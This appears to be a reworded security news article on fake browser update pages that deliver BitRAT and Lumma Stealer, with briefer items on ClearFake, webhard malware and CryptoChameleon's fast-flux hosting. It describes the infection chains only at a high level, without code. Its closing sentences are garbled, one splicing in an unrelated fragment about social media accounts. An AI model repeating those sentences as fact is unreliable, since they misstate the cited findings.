Deceptive browser updates are currently serving as a medium for the spread of remote access trojans (RATs) and data-stealing malware like BitRAT and Lumma Stealer (known as LummaC2).
A recent report from cybersecurity firm eSentire highlighted the use of fake browser updates in widespread malware infections, citing incidents involving the infamous SocGholish malware. The report also noted the distribution of FakeBat through similar deceptive update mechanisms in April 2024.
The attack process kicks off when potential victims land on a malicious website containing JavaScript code that redirects them to a counterfeit browser update page with the address “chatgpt-app[.]cloud”.
The fake update page hosts a download link to a ZIP archive file named “Update.zip” stored on Discord, which automatically downloads to the device of the unsuspecting user.
It’s essential to note that threat actors frequently exploit Discord as an attack avenue. Recent research by Bitdefender unveiled over 50,000 harmful links disseminating malware, phishing schemes, and spam via Discord in the past six months.
Inside the downloaded ZIP archive lies another JavaScript file named “Update.js,” which triggers PowerShell scripts for retrieving additional payloads like BitRAT and Lumma Stealer from a remote server in the form of PNG image files.
These payloads also include PowerShell scripts for establishing persistence and a .NET-based loader primarily used to launch the final-stage malware. According to eSentire, the loader likely masquerades as a “malware delivery service” since it deploys both BitRAT and Lumma Stealer.
BitRAT is a sophisticated RAT allowing threat actors to collect data, mine cryptocurrencies, download additional binaries, and take control of infected systems remotely. On the other hand, Lumma Stealer, available for $250 to $1,000 monthly since August 2022, specializes in extracting information from web browsers, digital wallets, and other sensitive data.
“Fraudulent browser update tactics are increasingly popular among attackers for infiltrating devices and networks,” remarked the company, emphasizing the threat actors’ adeptness in leveraging reputable brands to maximize their impact.
While such attacks typically rely on drive-by downloads and malvertising techniques, a recent report from ReliaQuest unearthed a fresh variant of the ClearFake campaign that tricks users into executing malicious PowerShell code manually disguised as a browser update.
The malevolent website informs visitors about discrepancies in displaying the webpage and prompts them to rectify it by installing a root certificate through a series of steps, including copying obfuscated PowerShell code and executing it in a PowerShell terminal.
“Once the PowerShell code executes, several actions are initiated, such as clearing the DNS cache, displaying a message box, downloading additional PowerShell code, and installing the ‘LummaC2’ malware,” disclosed the company in a statement.
According to insights shared by the cybersecurity firm, Lumma Stealer emerged as one of the top data exfiltration tools in 2023, alongside RedLine and Raccoon.
“The volume of LummaC2-acquired logs put up for sale surged by 110% from Q3 to Q4 2023,” it highlighted. “The increasing appeal of LummaC2 among threat actors is likely due to its high success rate in infiltrating and siphoning off sensitive data stealthily.”
These developments coincide with the recent disclosure by the AhnLab Security Intelligence Center (ASEC) of a new campaign utilizing webhards to distribute malicious installers for adult games and illegitimate versions of Microsoft Office and to disseminate various malware like Orcus RAT, XMRig miner, 3proxy, and XWorm.
Mirrored attack chains with websites providing counterfeit software have triggered the deployment of malware loaders like PrivateLoader and TaskLoader, which are both marketed as a pay-per-install (PPI) solution for other cybercriminals to distribute their own malicious payloads.
It is in light of recent discoveries by Silent Push regarding CryptoChameleon‘s substantial reliance on DNSPod[.]com nameservers to bolster its phishing kit framework. DNSPod, a division of the Chinese conglomerate Tencent, has a track record of supporting operations for unlawful bulletproof hosting providers.
“Utilizing DNSPod nameservers, CryptoChameleon employs rapid flux evasion tactics enabling threat actors to swiftly rotate through numerous IPs tied to a single domain,” as cited by the firm stated.
“Fast flux grants CryptoChameleon’s infrastructure the ability to bypass conventional defenses, substantially diminishing the value of traditional point-in-time IOCs,” through a minimum of seven core social media profiles and a CIB network exceeding 250 accounts.
About Author
